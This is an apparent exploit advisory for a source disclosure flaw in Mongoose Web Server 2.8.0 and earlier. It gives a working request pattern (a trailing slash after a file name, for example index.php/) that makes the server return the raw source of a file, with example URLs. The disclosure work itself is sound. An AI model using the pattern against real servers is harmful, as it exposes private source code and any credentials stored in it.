Mongoose Web Server versions 2.8.0 and below suffer from a remote source disclosure vulnerability.
de42bbe8b5418e0b3955394314e14cebeac3228c3c1732eff9a9fa188d93929a
#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: http://code.google.com/p/mongoose/
#
#######################################################
- Description -
Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.
Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.
- Technical Details -
http://[ webserver IP][:port]/[ file ][/]
http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/
#[pocoftheday.blogspot.com]